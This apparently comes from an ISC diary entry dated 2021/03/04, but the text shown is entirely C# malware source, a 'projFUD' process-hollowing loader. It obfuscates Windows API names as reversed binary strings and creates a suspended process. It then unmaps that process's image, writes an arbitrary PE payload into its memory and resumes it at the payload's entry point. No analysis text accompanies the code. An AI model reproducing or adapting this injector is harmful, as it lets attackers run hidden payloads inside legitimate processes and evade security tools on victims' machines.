ISC Diary 2021/03/04

1. using System;
2. using System.Diagnostics;
3. using System.Runtime.InteropServices;
4. using Microsoft.VisualBasic;
5.  
6. namespace projFUD
7. {
8. public static class PA
9. {
10. public static string ReverseString(string Str)
11. {
12. string Revstr = "";
13. int Length;
14. Length = Str.Length - 1;
15. while (Length >= 0)
16. {
17. Revstr = Revstr + Str[Length];
18. Length--;
19. }
20. return Revstr;
21. }
22. public static string BinaryToString(string str)
23. {
24. string chars = System.Text.RegularExpressions.Regex.Replace(str, "[^01]", "");
25. byte[] arr = new byte[(chars.Length / 8) - 1 + 1];
26. for (int i = 0; i <= arr.Length - 1; i++)
27. arr[i] = Convert.ToByte(chars.Substring(i * 8, 8), 2);
28. return System.Text.ASCIIEncoding.ASCII.GetString(arr);
29. }
30. private delegate int DelegateResumeThread(IntPtr handle);
31. private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
32. private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
33. private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
34. private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
35. private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
36. private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
37. private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
38. private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
39. private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
40. bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
41.  
42.  
43. private static string[] AL = Convert.ToString("0011001000110011011011000110010101101110011100100110010101101011|0110110001101100011001000111010001101110|011001000110000101100101011100100110100001010100011001010110110101110101011100110110010101010010|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010100110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101010011|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010001110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101000111|0111100001000101011000110110111101101100011011000100000101101100011000010111010101110100011100100110100101010110|011110010111001001101111011011010110010101001101011100110111001101100101011000110110111101110010010100000110010101110100011010010111001001010111|0111100101110010011011110110110101100101010011010111001101110011011001010110001101101111011100100101000001100100011000010110010101010010|0110111001101111011010010111010001100011011001010101001101100110010011110111011101100101011010010101011001110000011000010110110101101110010101010111011101011010|0100000101110011011100110110010101100011011011110111001001010000011001010111010001100001011001010111001001000011|").Split(new string[] { "|" }, StringSplitOptions.None);
44.  
45. private static string Kernel32 = BinaryToString(AL[0]);
46. private static string ntdll = BinaryToString(AL[1]);
47. private static string RsmThread = BinaryToString(AL[2]);
48. private static string Wow64SetThreadCtx = BinaryToString(AL[3]);
49. private static string SetThreadCtx = BinaryToString(AL[4]);
50. private static string Wow64GetThreadCtx = BinaryToString(AL[5]);
51. private static string GetThreadCtx = BinaryToString(AL[6]);
52. private static string VirtualAllcEx = BinaryToString(AL[7]);
53. private static string WriteProcessMem = BinaryToString(AL[8]);
54. private static string ReadProcessMem = BinaryToString(AL[9]);
55. private static string ZwUnmapViewOfSec = BinaryToString(AL[10]);
56. private static string CreateProcA = BinaryToString(AL[11]);
57.  
58.  
59. private static readonly DelegateResumeThread ResumeThread = LoadApi<DelegateResumeThread>(ReverseString(Kernel32), ReverseString(RsmThread));
60. private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi<DelegateWow64SetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64SetThreadCtx));
61. private static readonly DelegateSetThreadContext SetThreadContext = LoadApi<DelegateSetThreadContext>(ReverseString(Kernel32), ReverseString(SetThreadCtx));
62. private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi<DelegateWow64GetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64GetThreadCtx));
63. private static readonly DelegateGetThreadContext GetThreadContext = LoadApi<DelegateGetThreadContext>(ReverseString(Kernel32), ReverseString(GetThreadCtx));
64. private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx));
65. private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem));
66. private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem));
67. private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec));
68. private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));
69.  
70. [DllImport("kernel32", SetLastError = true)]
71. private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
72. [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
73. private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
74. private static CreateApi LoadApi<CreateApi>(string name, string method)
75. {
76. return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
77. }
78.  
79. [StructLayout(LayoutKind.Sequential, Pack = 1)]
80. private struct ProcessInformation
81. {
82. public readonly IntPtr ProcessHandle;
83. public readonly IntPtr ThreadHandle;
84. public readonly uint ProcessId;
85. private readonly uint ThreadId;
86. }
87. [StructLayout(LayoutKind.Sequential, Pack = 1)]
88. private struct StartupInformation
89. {
90. public uint Size;
91. private readonly string Reserved1;
92. private readonly string Desktop;
93. private readonly string Title;
94. [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)]
95. private readonly byte[] Misc;
96. private readonly IntPtr Reserved2;
97. private readonly IntPtr StdInput;
98. private readonly IntPtr StdOutput;
99. private readonly IntPtr StdError;
100. }
101.  
102.  
103. public static void Execute(string path, byte[] payload)
104. {
105. for (int i = 0; i < 5; i++)
106. {
107. int readWrite = 0;
108. StartupInformation si = new StartupInformation();
109. ProcessInformation pi = new ProcessInformation();
110. si.Size = UInt32.Parse(Marshal.SizeOf(typeof(StartupInformation)).ToString());
111. string ToInt32 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x33, 0x32 });
112. string ToInt16 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x31, 0x36 });
113.  
114. try
115. {
116. if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 4 | 134217728, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
117. int fileAddress = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, (30 * 2) } });
118. int imageBase = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + (26 * 2) } });
119. int[] context = new int[Convert.ToInt32(89 + 90)];
120. context[0] = 65538;
121. if (IntPtr.Size == 4)
122. { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
123. else
124. { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
125. int ebx = context[(20 + 21)];
126. int baseAddress = 0;
127. if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) throw new Exception();
128. if (imageBase == baseAddress)
129. if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) throw new Exception();
130. int sizeOfImage = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 80 });
131. int sizeOfHeaders = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 84 });
132. bool allowOverride = false;
133. int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64);
134.  
135. if (newImageBase == 0) throw new Exception();
136. if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
137. int sectionOffset = fileAddress + 248;
138. short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 6);
139. for (int I = 0; I < numberOfSections; I++)
140. {
141. int virtualAddress = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 12 });
142. int sizeOfRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 16 });
143. int pointerToRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 20 });
144. if (sizeOfRawData != 0)
145. {
146. byte[] sectionData = new byte[sizeOfRawData];
147. Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0, sectionData.Length);
148. if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
149. }
150. sectionOffset += 40;
151. }
152. byte[] GB = BitConverter.GetBytes(newImageBase);
153. if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, GB, 4, ref readWrite)) throw new Exception();
154. int addressOfEntryPoint = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + 40 } });
155. if (allowOverride) newImageBase = imageBase;
156. context[44] = newImageBase + addressOfEntryPoint;
157. if (IntPtr.Size == 4)
158. {
159. var x = SetThreadContext(pi.ThreadHandle, context);
160. if (!x)
161. {
162. throw new Exception();
163. }
164. }
165. else
166. {
167. var y = Wow64SetThreadContext(pi.ThreadHandle, context);
168. if (!y)
169. {
170. throw new Exception();
171. }
172. }
173.  
174. int r = (int)Interaction.CallByName(ResumeThread, BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { pi.ThreadHandle });
175.  
176. if (r == -1 * 1)
177. {
178. throw new Exception();
179. }
180. }
181. catch
182. {
183. Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
184. continue;
185. }
186. break;
187. }
188. }
189. }
190. }